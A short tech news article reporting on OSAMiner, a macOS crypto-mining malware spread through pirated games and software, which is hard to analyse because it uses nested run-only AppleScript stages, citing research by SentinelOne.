MacOS malware with crypto miner remained undiscovered for years

Get a free Techzine subscription!

In the last five years (perhaps more), macOS users have been targeted by a sneaky malware operation, which used a clever trick, making it virtually invisible, while hijacking hardware resources on infected machines to mine cryptocurrency.

The malware has been distributed in the wild since at least 2015 and has been named OSAMiner. It is disguised in pirated (cracked) games and software like League of Legends and Microsoft Office for Mac. According to SentinelOne, a security firm, which published a report this week.

OSAMiner has been active for a while and has evolved in recent times, according to a SentinelOne spokesperson.

Not too invisible

From the data collected, it seems that it attacked people in Chinese and Asian Pacific communities mostly.

However, the crypto miner did not completely avoid detection. Back in 2018 August and September, two Chinese security firms analyzed an older version of the Malware. However, the reports written after this were not very detailed and did not capture the full extent of OSAMiner’s capabilities.

The reason was that the researchers were unable to retrieve the malware’s full code. It used nested run-only AppleScript files to retrieve its malicious code across different stages at the time.

A very clever malware

When the users installed their pirated software, the disguised installers would download and run a run-only AppleScript. It would then download and run a second run-only AppleScript and then run another third/final one.

Because the run-only AppleScript is received in a compiled state (the source code is not readable by humans), security researchers’ analysis was not easy.

Phil Stokes, a macOS malware researcher at SentinelOne, published the attack’s full-chain with past and present OSAMiner campaigns and IOCs (Indicators of Compromise). The hope for this team of researchers is that they can crack the mystery around this clever malware.

Tip: